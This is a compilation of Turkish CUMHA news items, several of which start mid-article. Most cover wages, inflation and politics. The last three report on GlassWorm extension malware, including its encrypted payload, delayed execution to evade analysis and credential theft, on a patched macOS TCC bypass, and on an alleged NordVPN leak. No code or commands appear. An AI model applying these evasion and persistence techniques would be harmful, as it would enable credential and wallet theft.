ANKARA’DAKİ BULUŞMA: GENÇLİK YAPILANMASI, EKONOMİ VE SAHA HEDEFLERİ
Toplantı boyunca yapılan değerlendirmelerde, gençlik yapılanmasının yeni dönemde sahada daha görünür olması, gençliğin ekonomik ve sosyal başlıklardaki gündemi, teşkilatın hedefleri ve çalışma disiplini öne çıktı. Program, katılımcıların yeni döneme ilişkin mesajlarının kamuoyuna aktarılmasıyla tamamlandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Türk ve Kürt kardeştir, kaderi ortaktır”
Erbakan, “terörsüz Türkiye” başlığı altında yürütülen sürece ilişkin değerlendirmesinde, “Türk ve Kürt kardeştir, Kürt ve Türkün kardeşliği ezelden ebededir.” ifadesini kullandı. Kardeşliğin tarihsel ortak mücadelelerle kurulduğunu söyleyen Erbakan, “Kimse bu kardeşliği bozmaya muvaffak olamayacaktır.” dedi.

Suriye vurgusu: “Toprak bütünlüğü hassasiyetimiz”
Konuşmasında Suriye başlığına da değinen Erbakan, bölgenin parçalanmasına yol açacak adımların önlenmesi gerektiğini ifade ederek Suriye’nin üniter yapısı ve toprak bütünlüğünün korunmasının önemine işaret etti.

Asgari ücret: “Açıklandığı anda açlık sınırının altında kaldı”
Erbakan, asgari ücretin 28 bin 75 lira olarak açıklanmasına ilişkin değerlendirmesinde, açlık sınırının 30 bin liranın üzerine çıktığını belirterek, “İlk defa açıklandığı anda açlık sınırının altında bir ücret olarak açıklanmış oldu.” sözleriyle tabloyu eleştirdi. Kira ve gıda harcamaları üzerinden hesap yapan Erbakan, dört kişilik bir ailede kişi başına öğün başına ayrılabilen tutarın “22 lira” seviyesine indiğini kaydetti.

“Asgari ücret 45 bin lira olmalı”
Yeniden Refah Partisi’nin asgari ücret önerisini paylaşan Erbakan, “Asgari ücretin kırk beş bin lira olması gerektiğini ifade ediyoruz.” dedi. Finansman tartışmalarına da yanıt veren Erbakan, bütçede faize ayrılan kaynağı işaret ederek, “Bir maaş işverenden bir maaş devletten olur.” sözleriyle devlet destekli model önerisini dile getirdi.

Mutfak hesabı: Et fiyatları üzerinden alım gücü karşılaştırması
Erbakan, et fiyatları üzerinden alım gücündeki gerilemeyi anlatarak Türkiye’de 1 kilogram dana etinin 864 liraya yükseldiğini, asgari ücretlinin aylık alım miktarının düştüğünü söyledi. Avrupa ülkeleriyle kıyaslama yapan Erbakan, aradaki farkın büyüdüğünü vurguladı.

“Borç-faiz-zam-vergi” eleştirisi: “Kazanan hep aynı”
Ekonomi yönetimine yönelik eleştirilerini sürdüren Erbakan, mevcut düzeni “borç, faiz, zam ve vergi” ekseninde tarif ederek, zamlar ve vergilerle kaynak bulunurken bankacılık sektörünün yüksek kârlar elde ettiğini söyledi. Erbakan, üretim ve emeğin bu sistemde baskılandığını kaydetti.

Dış politika: Venezuela üzerinden “gücün hukuku” vurgusu
Erbakan, Venezuela başlığı üzerinden uluslararası sistem eleştirisi yaparak, güç kullanımının hukukun önüne geçtiğini savundu. Konuşmasında, küresel siyasette “gücün üstün tutulduğu” anlayışın yaygınlaştığını belirterek, “Uluslararası hukuk hiçe sayılıyor.” değerlendirmesinde bulundu.

CUMHA’nın sorusu ve Erbakan’ın yanıtı: “Emekliye reva görülen maaş kabul edilemez”
Basın toplantısının soru-cevap bölümünde, CUMHA Cumhur Haber Ajansı adına Serdar Nalcı’nın 32:02’den itibaren yönelttiği soruya yanıt veren Erbakan, en düşük emekli aylıklarına ilişkin eleştirisini yineleyerek, “Bu kabul edilebilir bir rakam değildir.” dedi. Erbakan, en düşük emekli maaşının asgari ücrete eşitlenmesi gerektiğini ifade ederek, “En düşük emekli aylığının da asgari ücrete eşitlenmesi gereklidir.” sözlerini kullandı.

Toplantının sonunda Erbakan, gündeme ilişkin değerlendirmelerini tamamladığını belirterek basın mensuplarına teşekkür etti. Program, İl Başkanları Toplantısı gündemiyle devam etti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yoğun Katılım, Ailelerle Buluşma
Programda farklı illerden KGK temsilcileri ve üyelerinin bir araya geldiğini belirten Mehmet Ali Dim, katılan üyelere ve aile fertlerine teşekkür ederek “Sevgili çocukları da, kıymetli hanımefendileri de sevgi ve saygıyla selamlıyorum. Tekrar hoş geldiniz.” dedi.

“44 Yıldır Konuşuyoruz, Bu Defa Sorun Daha Ciddi”
Dim, mesleğin her ocak ayında sorunlarını konuştuğunu ancak kalıcı çözümlerin geciktiğini vurgulayarak, “Sektörde 44 yıldan beri hep konuşuyoruz… Hep sorunlarımız var, hep sıkıntılarımız var. Ama geldiğimiz noktada da çözüm yok.” ifadelerini kullandı. Dim, gazeteciliğin imajını ve itibarını aşağı çeken bir süreç yaşandığını kaydetti.

Dijitalleşme Vurgusu, “Asıl Tehlike Sosyal Medyada”
Dijital yayıncılığın kaçınılmaz olduğuna işaret eden Dim, Türk medyasının dijital dönüşüm hızını “takdir ettiğini” belirterek, “Dijital yayıncılık artık bir vazgeçilmez unsur.” dedi. Buna karşın Dim, “Gazeteci olmayıp da gazetecilik yaptığını iddia eden ciddi bir kitle var.” sözleriyle sosyal medya kaynaklı risklere dikkat çekti.

“İletilerin Yüzde 86’sı Fake” İddiası
Dim, sosyal medyada dolaşan içeriklerin önemli bir bölümünün gerçek dışı olduğunu savunarak, “Bugün sosyal medyada paylaşılan iletilerin yüzde 86’sının fake olduğunu ben söylemiyorum; istatistikler söylüyor.” dedi. Dim, bu tablo karşısında mesleğin itibarının korunması için yapısal düzenleme gerektiğini dile getirdi.

“Baro Gibi Meslek Birliği Yasasına İhtiyaç Var”
Çözüm önerisini “meslek birliği yasası” olarak açıklayan Dim, “Bir baro gibi… Yasayla kurulmuş, her ilde örgütlenmiş bir birliğe ihtiyacımız var.” ifadelerini kullandı. Dim, bu yapının gazetecilerden oluşması gerektiğini belirterek “Gazeteci olmayana basın kartı vermez.” dedi.

Siyasi Destek Çağrısı: “Köprüden Önce Son Çıkış”
Dim, meslek birliği yasası için siyasi partilerle temasların artırılması gerektiğini vurgulayarak il temsilcilerine çağrıda bulundu. Dim, “İllerinize gelen siyasetçilere lütfen bunu söyleyin… Bu artık bir keyfi şey değil, şart zorunluluk haline geldi.” dedi. Konuşmasında, “Bu bizim artık köprüden önce son çıkışımız.” ifadesini kullanarak gazeteciliğin “bitiş noktasına” sürüklenmemesi için ortak lobi talep etti.

“80 Ülkede Temsilcilik” Bilgisi
KGK’nın dış temsilcilik ağının büyüdüğünü belirten Dim, ülke temsilciliği sayısının 80’e ulaştığını söyledi. Dim, dergide dış temsilcilerin yazılarına daha fazla yer verdiklerini belirterek, farklı ülkelerde gazeteciliğin sorunlarının “birebir örtüştüğünü” dile getirdi.

CUMHA Özel Röportajı: “Faaliyet Durmaz, İtibar İçin Çalışıyoruz”
CUMHA Cumhur Haber Ajansı adına konuşan Hüseyin Bekar’ın sorularını yanıtlayan Dim, KGK’nın düzenli etkinliklerle mesleğin saygınlığını güçlendirmeyi hedeflediğini ifade etti. Dim, “Gazeteciler mesleğinin daha itibarlı hale gelmesini istiyoruz.” dedi. Bazı yapılanmaların “kâğıt üzerinde” kaldığını söyleyen Dim, “Sadece kart bastırıp dağıtıyorlar… Itibarınızı ediliyor.” sözleriyle eleştiride bulundu.

Yapay Zekâ ve İşsizlik: “Eleman Azaltmaya Gidiliyor”
Röportajda gazetecilikte işsizliğin arttığını kaydeden Dim, yapay zekânın editoryal süreçlerde kullanılmasının personel ihtiyacını düşürdüğünü savundu. Dim, “Haber’e yazdırıyorum, siteye koyuyorum, elemana gerek yok diyor.” örneğini aktararak, “Kurumlar eleman azaltmaya gidiyor… Fason kadroya geçiyor.” ifadelerini kullandı. Denetim vurgusu yapan Dim, ilgili kurumların “kadro var mı yok mu” başlığında kontrolü sıklaştırması gerektiğini dile getirdi.

Basın Kartı Tartışması: “Suistimale Açık”
Dim, basın kartı sistemine ilişkin değerlendirmesinde, “Basın kartını devlet vermeye devam ederse bu olmaz.” dedi. Röportajda İstanbul’da bir taksiciyle yaşadığını belirttiği örneği anlatarak, “Taksici… basın kartını gösterdi bana. Benim basın kartının aynı sonda var.” ifadelerini kullandı. Dim, “Eğer meslek birliği yasayla kurulursa… ben taksiciye kart verir miyim?” sözleriyle çözümün mesleğin yasayla örgütlenmesi olduğunu yineledi.

Yurt Dışı Programları ve Kamu Diplomasisi
KGK’nın yurt dışı faaliyetlerine de değinen Dim, 80 ülkede temsilciliği bulunan bir yapının Türkiye’nin görünürlüğüne medya üzerinden katkı sunabileceğini ifade etti. Dim, yurt dışı programlarının kamu diplomasisi açısından önemini vurgulayarak, yeni dönemde farklı ülkelerde etkinlik ve temas planlarının sürdüğünü söyledi.

KGK’nın Ankara’daki buluşmasında, meslek örgütlenmesi ve yasal düzenleme çağrısı öne çıkarken, sosyal medya dezenformasyonu, basın kartı uygulamaları ve yapay zekânın sektöre etkileri programın ana başlıkları arasında yer aldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Asgari ücretlinin kaybına altınla değil makarnayla baktık”
Ömer Fethi Gürer, “Cumhurbaşkanı altın hesabını seviyor ama biz makarna üzerinden baktık. Asgari ücretlinin bir yılda alım gücüyle 474 adet 500 gram makarna sofrasından eksildi.” dedi. Gürer, asgari ücretteki artışın gıda fiyatları karşısında yetersiz kaldığını vurguladı.

Makarna fiyatları enflasyonun üzerinde arttı
Gürer’in paylaştığı verilere göre, Ocak 2025–Ocak 2026 döneminde aynı markette satılan aynı marka ve kalitedeki makarnalarda ciddi fiyat artışları yaşandı. Üst segment bir makarna 28,75 liradan 52,95 liraya çıkarak yüzde 84 zamlandı. Popüler segmentteki ürün 16 liradan 30,95 liraya yükselerek yüzde 93 artış gösterdi. En ucuz segmentteki makarna ise 11 liradan 18,50 liraya çıkarak yüzde 68 oranında zamlandı.

Buğday fiyatı yerinde saydı, makarna katlandı
Toprak Mahsulleri Ofisi’nin 2025 yılı hasat döneminde buğday alım fiyatını kilo başına 13 lira olarak açıkladığını anımsatan Gürer, tüccarın buğdayı 11 liradan aldığını belirtti. Gürer, “Çiftçi buğdayını maliyetin altında satarken, makarna fiyatları buğday fiyatını sollayıp geçti.” diye konuştu.

Asgari ücretlinin alım gücü eridi
Gürer’in hesaplamalarına göre, Ocak 2025’te 22 bin 104 lira olan asgari ücretle popüler bir makarna markasından 1.381 paket alınabilirken, Ocak 2026’da 28 bin 75 liraya çıkan asgari ücretle bu miktar 907 pakete düştü. Böylece asgari ücretlinin sofrasından 474 paket makarna eksildi. Üst segment ürünlerde kayıp 238 paket, en ucuz segmentte ise 492 paket olarak hesaplandı.

“Buğdayın anavatanında makarna lüks oldu”
Ömer Fethi Gürer, “Bir yıl önce 16 liraya alınan makarna bugün 31 liraya dayandı. Garibanın yemeği denilen makarna bile yüzde 93 zamlandıysa, burada ciddi bir yönetim sorunu vardır. Buğdayın anavatanı olan bu topraklarda hem çiftçi hem tüketici mağdur ediliyor.” ifadelerini kullandı.

“Tencereye giren azalıyor”
Market raflarındaki fiyatların TÜİK verileriyle örtüşmediğini savunan Gürer, “Asgari ücreti artırdık deniliyor ama geçen yıl 11 lira olan makarna 18,50 liraya, 28 lira olan makarna 53 liraya çıktı. Cebe giren para artıyor gibi görünüyor ama tencereye giren azalıyor.” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

BÜROKRASİDEN SİYASETE UZANAN YOL
Arslan, 1963 yılında Ankara Beypazarı Dikmen Köyü’nde doğduğunu, ilkokul ve ortaokulu Beypazarı’nda okuduğunu belirtti. Keçiören Çevre Sağlığı Koleji’ni yatılı olarak kazandığını, 1981’de mezun olduğunu kaydeden Arslan, “İstanbul Sağlık Müdürlüğü, Ankara Sağlık Müdürlüğü, Sağlık Bakanlığı’nın çeşitli kademelerinde çalıştım.” dedi.

Mezuniyet sonrası öğretmenlik ve idarecilik yaptığını anlatan Arslan, bakanlık merkez teşkilatında şube müdürlüğü, personel şube müdürlüğü ve personel daire başkanlığı görevlerinde bulunduğunu, 2019’a kadar bakanlık müşavirliği ve daire başkanlığı görevleri yürüttüğünü ifade etti.

ABB DÖNEMİ VE SAHAYA VURGU
Arslan, 2019 sonrası Ankara Büyükşehir Belediyesi’nde özel kalem müdürlüğü ve insan kaynakları daire başkanlığı görevlerini yürüttüğünü belirterek, hizmet önceliğinin sahada oluştuğunu söyledi. “Ben bir taşralıyım. Başkent olmasına rağmen Ankara’nın taşrası çok ihmal edilmiştir, bu çocukluktan beri içimde yaradır.” ifadesini kullandı.

“ANKARA SADECE BAŞKENT DEĞİL, MEMLEKET”
Arslan, muhtarlarla kurulan temasın yerel sorunların çözümünde kritik olduğunu vurguladı. “Demokrasinin ilk ayağı olan köy muhtarlarımız, mahalle muhtarlarımızla çok iyi bir diyalog kurduk. Sorunlarını hızlı şekilde çözmenin yolunu aradık.” dedi.

TBMM çalışmalarının yanı sıra ziyaretçi trafiğinin hiç bitmediğini ifade eden Arslan, milletvekilliğinin ilk döneminde Yenikent başlığıyla bir kanun teklifi verdiğini aktararak, “Yüz altmış bine ulaşan nüfus… belediyesi kalkmış ama zorluk ve sıkıntıları var. Netice alamadık ama çabamız devam ediyor.” diye konuştu.

ANKARA’NIN DIŞ İLÇELERİ: İŞSİZLİK, SU, ALTYAPI, HİZMETE ERİŞİM
Hüseyin Bekar’ın soruları üzerine Arslan, Ankara’nın çevre ilçelerinde öne çıkan başlıkları “işsizlik, su, altyapı ve devlet hizmetlerine erişim” olarak sıraladı. Arslan, “Başkent ama taşra ilçelerine hizmetin ağır gittiği bir yorgunluk var.” değerlendirmesinde bulundu.

BÜYÜKŞEHİR YASASI ELEŞTİRİSİ: “KÖYLER BOŞALDI, TARIM SAHİPSİZ KALDI”
Arslan, köylerin mahalle statüsüne geçmesi sonrası hizmet zincirinde aksaklıklar yaşandığını savundu. “Eskiden köylerde sağlık ocakları, okullar, jandarma, postane vardı… insanlar bir iğne için şehir merkezine gitmezdi.” diyen Arslan, kırsalın zayıflamasıyla göçün hızlandığını ileri sürdü.

Tarımda üretimin gerilemesinin istihdamı doğrudan etkilediğini söyleyen Arslan, “Birinci sorun işsizlik ve tarım. Tarım gelişirse işsizliğin de azalacağını düşünüyorum.” ifadelerini kullandı.

GIDA, ÜRETİM VE PLANLAMA VURGUSU
Arslan, kamu yönetiminde planlamanın önemine işaret ederek, “Devlette bir planlama vardı… ihtiyaca göre planlama yapılır.” dedi. İstihdamın üretimle birlikte büyümediğini savunan Arslan, eğitimli işsizliğin arttığını, bunun da sosyal baskıyı derinleştirdiğini kaydetti.

ULAŞIM: ESENBOĞA METROSU VE ANKARA’DA ARTIŞ GÖSTEREN TRAFİK
Ulaşım başlığında Arslan, Esenboğa Havalimanı metrosunun yıllardır yatırım programında bulunduğunu ancak tamamlanmadığını söyledi. “2017’de yatırım programına alınmış… aradan dokuz yıl geçti.” diyen Arslan, yetki ve sorumluluk tartışmalarının projeyi geciktirdiğini belirtti.

Keçiören metrosu örneği üzerinden geçmiş süreçleri anlatan Arslan, ulaşım yatırımlarında “siyasi çekişmeler yerine net takvim ve şeffaf sorumluluk” çağrısı yaptı. Arslan ayrıca Ankara’da otobüs filosunun yenilenmesine ilişkin, “Yirmi sene otobüs alınmamış… dört yüzün üzerinde yeni otobüs alındı.” dedi.

KURUM TAŞINMALARI, BAŞKENTİN KİMLİĞİ VE TURİZM POTANSİYELİ
Arslan, bazı finans kurumlarının ve kamu birimlerinin İstanbul’a taşınmasını eleştirerek, başkentin “memur şehri olmaktan çıkması” gerektiğini savundu. Ankara’nın savunma sanayinde geliştiğini ancak bunun şehir ölçeğinde daha geniş bir ekonomik yapıyla desteklenmesi gerektiğini dile getirdi.

Termal turizm ve kültür turizmine de değinen Arslan, Kızılcahamam, Haymana, Ayaş, Güdül ve Beypazarı hattındaki potansiyeli hatırlattı. “Ankara’da direkt uçuşların sayısının artırılması gerekiyor.” diyen Arslan, Esenboğa metrosunun da bu çerçevede “bir an önce bitirilmesi” gerektiğini vurguladı.

ALTYAPI, SU YÖNETİMİ VE SEL RİSKİ
Arslan, Ankara’da altyapı açığı bulunduğunu belirterek, bazı bölgelerde su baskını riskine ilişkin geçmiş uyarıların olduğunu, son yıllarda belirli noktalarda çalışma yürütüldüğünü söyledi. Baraj dolulukları ve iklim koşullarına ilişkin de değerlendirmeler yapan Arslan, yağışların etkisiyle “birikim başladığı” bilgisini paylaştı.

İŞSİZLİK VE HAYAT PAHALILIĞI: “EVE EKMEK GÖTÜREMEMEK”
Arslan, işsizliğin Ankara ve Türkiye’nin temel sorunlarından biri haline geldiğini ifade ederek, “İşsizlik eve ekmek götürememektir.” dedi. Üniversite sayısının artmasına rağmen istihdam alanlarının aynı hızla genişlemediğini savunan Arslan, enflasyon ve yaşam maliyeti nedeniyle “çalışan iki kişinin bile ev ve araç hayali kuramadığını” söyledi.

Toplumsal risklere de dikkat çeken Arslan, gençlerde umutsuzluk ve “sosyal kırılganlık” başlıklarının büyüdüğünü kaydetti; madde bağımlılığı ve dijital ortamda yayılan riskler konusunda daha etkin mücadele çağrısında bulundu.

“TERÖRSÜZ TÜRKİYE” TARTIŞMASI: “GÜVEN OLMADAN SÜREÇ YÜRÜMEZ”
Hüseyin Bekar’ın süreçle ilgili sorusu üzerine Arslan, “Terörsüz Türkiye’yi kim istemez… hepimiz isteriz.” ifadelerini kullanırken, geçmişte yaşanan tecrübeler nedeniyle güven unsurunun belirleyici olduğunu savundu. Arslan, sürecin şeffaf yürütülmesi, hesap verebilirlik ve toplumsal mutabakatın önemine işaret etti.

Meclis zeminindeki çalışmalara ilişkin değerlendirmelerinde Arslan, siyasi tartışmaların “net hedef, açık çerçeve ve kamuoyunu ikna eden yöntemlerle” yürütülmesi gerektiğini dile getirdi.

SPOR BAŞLIĞI: ASKİ SPOR, GÜREŞ VE TESİSLEŞME
Röportajın ilerleyen bölümünde Arslan, Ankara’da sporun gelişimine yönelik çalışmaları da anlattı. ASKİ Spor Kulübü’nde bir dönem başkanlık yaptığını belirten Arslan, “ASKİ Spor güreşin lokomotifi… güreşe daha ağırlık verdik.” dedi.

Batıkent’te spor tesisleri kompleksi kurulduğunu, yağlı güreş branşında tesisleşmeye gidildiğini ifade eden Arslan, amatör spor kulüplerinin daha fazla desteklenmesi gerektiğini söyledi. Ankara futboluna ilişkin değerlendirmelerinde ise Gençlerbirliği ve Ankaragücü’nün durumuna değinerek, Ankara’da sporun büyümesi için “el birliği” çağrısı yaptı.

DIŞ GELİŞMELER VE GAZZE VURGUSU
Röportajın kapanışında Arslan, küresel gerilimlere değinerek, “Güçlünün zulmünden bu dünyanın kurtulması lazım.” ifadesini kullandı. Gazze ve Filistin’de yaşanan insani kayıplara dikkat çeken Arslan, uluslararası mekanizmaların etkisiz kaldığını savunarak zulmün son bulması temennisini dile getirdi.

Hüseyin Bekar, röportaj sonunda Yüksel Arslan’a teşekkür ederek yayını sonlandırdı. Arslan ise TBMM’de ve sahada Ankara’ya ilişkin takip ettikleri başlıklarda çalışmalarını sürdüreceklerini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“YÜZDE 18,6 BEKLENTİLERİ KARŞILAMADI.”
Bekar’ın “Yüzde 18,6’lık zam memnun etti mi?” sorusunu yanıtlayan Mücahit Dede, “Üç milyon yedi yüz kamu çalışanı ve iki buçuk milyon memur emeklisinin beklentilerini karşılamadı.” dedi. Dede, kamu çalışanlarının pazara, markete çıktığında mevcut fiyatlarla yaşam kuramadığını belirterek, geçim koşullarının ağırlaştığını vurguladı.

“TAM BİR TİYATRO.”
Toplu sözleşme sürecine ilişkin değerlendirmelerde bulunan Dede, masadaki yapının kamu çalışanlarının taleplerini karşılamadığını söyleyerek, “Memurun adı orada yok, tam bir tiyatro.” ifadelerini kullandı. Dede, toplu sözleşmenin “özgür bir pazarlık zemini” olmadığını savunarak, sürecin kamu çalışanları açısından sonuç üretmediğini dile getirdi.

“ANCAK KURU EKMEK VE SU ALABİLİR.”
Sosyal haklar ve yemek yardımı üzerinden hayat pahalılığına dikkat çeken Dede, günlük yemek bedelinin gerçekçi olmadığını belirtti. Dede, “Bu rakamlara insanların yemek yeme şansı yok, ancak bir memur ondan kuru ekmek ve su alabilir.” dedi. Kamu çalışanlarının temel ihtiyaçlarının karşılanmasında ciddi bir aşınma yaşandığını kaydetti.

“FİİLİ HİZMET ZAMMI İÇİN BEŞ YÜZ YIL ÇALIŞMAK GEREKİR.”
Röportajda itfaiyecilerin sorunları da gündeme geldi. Dede, itfaiyecilerin yangın, deprem, su altı arama-kurtarma ve trafik kazaları gibi alanlarda görev yaptığını; risk ve yıpranma düzeyi yüksek olmasına karşın meslek sınıfı kapsamında değerlendirilmediklerini söyledi. Fiili hizmet zammının işleyişine yönelik eleştirisini “Bir itfaiyecinin dönem içinde alması gereken fiili hizmet zammını alması için en az beş yüz yıl çalışması gerekiyor.” sözleriyle dile getirdi.

“ORMANLARIMIZIN TALANINA KARŞI MECLİS’E YÜRÜDÜK.”
Sendikal mücadelenin yalnızca ücret başlığıyla sınırlı olmadığını belirten Dede, doğa ve yaşam alanlarına dair sorumluluk vurgusu yaptı. Orman yangınları gündeminde hem kayıplara hem de ormanların “sermayeye açılması” tartışmasına değinen Dede, “Ormanlarımızın talanına karşı Meclis’e yürüdük.” dedi. Dede, yürüyüşün aynı zamanda itfaiyecilerin mesleki sorunlarını görünür kılma hedefi taşıdığını aktardı.

“PROMOSYON BİR HAK.”
Belediye çalışanlarının banka promosyonlarına ilişkin soruyu yanıtlayan Dede, promosyonun ekonomik sıkışmışlıkta çalışanların nefes alacağı bir kalem olduğunu belirterek, “Promosyon bir hak.” dedi. Ankara Büyükşehir Belediyesi örneğini paylaşan Dede, kamu bankalarının ihaleye katılmamasıyla rekabetin oluşmadığını, sürecin belirsizleştiğini ve bu durumun çalışanlar üzerinde baskı yarattığını savundu.

“TÜİK’İN RAKAMINI DEĞİL, PAZARI ESAS ALIN.”
Röportajın bir diğer başlığında TÜİK verileri tartışıldı. Bekar’ın, enflasyon verilerinin milyonların maaşını ve mutfağını etkilediğine ilişkin hatırlatmasının ardından konuşan Dede, vatandaşın gerçeği pazarda, markette ve kira artışlarında gördüğünü söyledi. Dede, “TÜİK’in rakamını değil, pazarı esas alın.” çağrısında bulundu.

“2026 YILI HALKIMIZ İÇİN DAHA ZOR GEÇECEK.”
Röportajın kapanış bölümünde Mücahit Dede, ekonomik baskının artacağına yönelik değerlendirmesini paylaştı. Dede, zamların kısa sürede eridiğini, sokaktaki fiyat artışlarının geçimi zorlaştırdığını belirterek, “2026 yılı halkımız için daha zor geçecek.” dedi. Dede, sendikanın “emekten ve halktan yana” duruşunu sürdüreceğini ve mücadeleden geri adım atmayacaklarını ifade etti.

Röportajda Mücahit Dede, belediyelerde sosyal denge sözleşmeleri ve toplu sözleşme uygulamalarına ilişkin değerlendirmelerini de paylaşırken; kamu çalışanlarının ekonomik ve sosyal haklarının güncellenmesi gerektiğini vurguladı. Dede, itfaiyeciler için meslek sınıfı tanımı, yıpranma hakkı ve ülke genelinde standart oluşturulması çağrısını yineledi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Karar kapsamında, posta veya hızlı kargo taşımacılığı yoluyla bir gerçek kişiye gelen ve ticari miktar ve mahiyet arz etmeyen, değeri 1500 Avro’yu geçmeyen eşyalara uygulanacak vergilendirme esasları yeniden düzenlendi.

Vergi Oranları Yeniden Belirlendi
Yapılan değişikliğe göre, söz konusu eşyanın Avrupa Birliği ülkelerinden doğrudan gelmesi halinde yüzde 30, diğer ülkelerden gelmesi halinde ise yüzde 60 oranında tek ve maktu vergi tahsil edilecek. Ayrıca, Özel Tüketim Vergisi Kanunu’na ekli (IV) sayılı listede yer alan eşyalar için bu oranlara ilave yüzde 20 uygulanacağı hüküm altına alındı.

Parasal Sınır İfadesi Kaldırıldı
Kararın bir diğer maddesiyle, aynı düzenlemenin 126’ncı maddesinde yer alan “30 Avro’yu aşan ancak” ibaresi yürürlükten kaldırıldı. Böylece ilgili maddede yer alan parasal sınırlamaya ilişkin ifade mevzuattan çıkarılmış oldu.

Yürürlük ve Yetki
Resmî Gazete’de yayımlanan karara göre düzenleme, yayım tarihinden 30 gün sonra yürürlüğe girecek. Kararın hükümlerinin Ticaret Bakanı tarafından yürütüleceği belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

GlassWorm ilk kez ekim ayında ortaya çıktı. Zararlı yazılım, görünmez Unicode karakterler kullanılarak gizlenen eklentiler aracılığıyla GitHub, npm ve OpenVSX hesap bilgilerini, ayrıca tarayıcı tabanlı kripto cüzdan verilerini ele geçirmeyi hedefledi. Önceki dalgalarda Windows sistemler odak alınırken, son kampanyada yalnızca macOS kullanıcılarının hedef seçildiği bildirildi.

Yeni Saldırı Yöntemi ve Teknik Detaylar
Araştırmacılara göre son dalgada, önceki sürümlerde kullanılan Unicode gizleme veya Rust tabanlı ikililer yerine, AES-256-CBC ile şifrelenmiş bir yük derlenmiş JavaScript kodu içine gömülüyor. Zararlı eklentilerin, kurulumu takip eden 15 dakikalık gecikmeyle çalıştığı ve bu yöntemin analiz ortamlarından kaçınmayı amaçladığı ifade edildi.

GlassWorm’un yeni sürümü, PowerShell yerine AppleScript kullanıyor ve kalıcılık için Windows Kayıt Defteri yerine LaunchAgents mekanizmasından yararlanıyor. Komuta-kontrol altyapısında ise önceki kampanyalarda da kullanılan Solana blokzinciri tabanlı yapı korunuyor.

Trojenli Donanım Cüzdanları ve Keychain Hedefi
Zararlı yazılımın, 50’den fazla tarayıcı kripto eklentisini, geliştirici hesap bilgilerini ve tarayıcı verilerini hedef almasının yanı sıra artık macOS Keychain parolalarına erişmeye çalıştığı kaydedildi. Ayrıca sistemde Ledger Live ve Trezor Suite gibi donanım cüzdan uygulamalarını tespit ederek, bunları trojenli sürümlerle değiştirmeyi amaçlayan yeni bir yetenek eklendi.

Koi Security, bu mekanizmanın şu an için başarısız olduğunu ve trojenli cüzdan dosyalarının boş döndüğünü belirtti. Kurum, “Bu durum saldırganların macOS cüzdan trojenlerini henüz hazırlamakta olduğunu ya da altyapının geçiş aşamasında bulunduğunu gösteriyor. Ancak tüm diğer zararlı işlevler aktif durumda.” açıklamasını yaptı.

Binlerce İndirme, Artan Risk
OpenVSX üzerinde yayımlanan ve zararlı olduğu tespit edilen eklentilerden bazılarının 33 bini aşkın indirme sayısına ulaştığı görüldü. Uzmanlar, bu tür rakamların güvenilirlik algısı oluşturmak için manipüle edilebildiğine dikkat çekti.

Güvenlik uzmanları, ilgili eklentileri yükleyen geliştiricilerin derhal kaldırma, GitHub parolalarını sıfırlama, npm erişim anahtarlarını iptal etme, sistemlerini detaylı şekilde kontrol etme ve gerekirse işletim sistemini yeniden kurma çağrısında bulundu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Güvenlik araştırmacılarının paylaştığı bilgilere göre zafiyet, VoiceOver framework’ü üzerinden çalışan com.apple.scrod sistem servisini hedef alıyor. Bu yapı istismar edilerek Apple tarafından imzalanmış süreçler içinde kod çalıştırılabildiği, bunun için yönetici yetkisine gerek duyulmadığı kaydedildi.

Kod Enjeksiyonu ve TOCTOU Birlikteliği
Açığın istismar sürecinde iki kritik unsurun bir araya geldiği aktarıldı. Bunların, Apple imzalı süreçlere yönelik kod enjeksiyonu ve bir Time-of-Check-Time-of-Use (TOCTOU) yarış durumu olduğu ifade edildi. Bu kombinasyonun, TCC korumasını tamamen etkisiz hale getirdiği vurgulandı.

Bu yöntemle saldırganların; belgelere erişebildiği, mikrofonu kullanabildiği, Finder ile etkileşime girebildiği ve AppleScript komutlarını çalıştırabildiği, tüm bunların ise kullanıcıya herhangi bir bildirim gösterilmeden gerçekleştirilebildiği aktarıldı.

Apple’dan Güvenlik Güncellemesi
Apple, söz konusu güvenlik açığını macOS 26.2 sürümünde yayımladığı güncellemeyle giderdi. Güncelleme kapsamında, com.apple.private.accessibility.scrod yetkisinin süreç denetim belirteci üzerinden doğrulanmasının zorunlu hale getirildiği, bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin kapatıldığı bildirildi.

Apple, macOS 26.2 güvenlik güncellemesine ilişkin teknik detayları resmi güvenlik bülteninde paylaştı. Kullanıcıların, Sistem Ayarları > Yazılım Güncelleme adımlarını izleyerek en son sürüme geçmeleri önerildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dark Web Forumunda Paylaşıldı
Dark Web Informer tarafından aktarılan bilgilere göre, sızdırıldığı iddia edilen veriler bir dark web forumunda satışa veya paylaşıma açıldı. Tehdit aktörü, ele geçirilen bilgilerin NordVPN’e ait Salesforce veritabanı içerikleri olduğunu savundu.

Brute Force ile Erişim İddiası
Paylaşımda, saldırganın yanlış yapılandırılmış bir NordVPN geliştirme sunucusunu brute force yöntemiyle ele geçirdiği ileri sürüldü. Bu sunucuda Salesforce ve Jira sistemlerine ait bilgilerin birlikte tutulduğu iddia edildi.

Sızdırıldığı Öne Sürülen Veriler
Dark Web Informer, tehdit aktörünün paylaştığını iddia ettiği örnekler üzerinden şu bilgilerin ele geçirildiğini bildirdi:
10’dan fazla veritabanı kaynak kodu, Salesforce API anahtarları, Jira erişim tokenları ve ek hassas teknik bilgiler.

SQL Dökümleri Paylaşıldı
Forumda yayınlanan örnek SQL dökümlerinde, “salesforce_api_step_details” ve “api_keys” tablolarına ait yapılar ile ayrıntılı veritabanı şema bilgilerinin yer aldığı öne sürüldü. Bu örneklerin, iddiaların gerçekliğini desteklemek amacıyla paylaşıldığı ifade edildi.

NordVPN’den Resmî Açıklama Bekleniyor
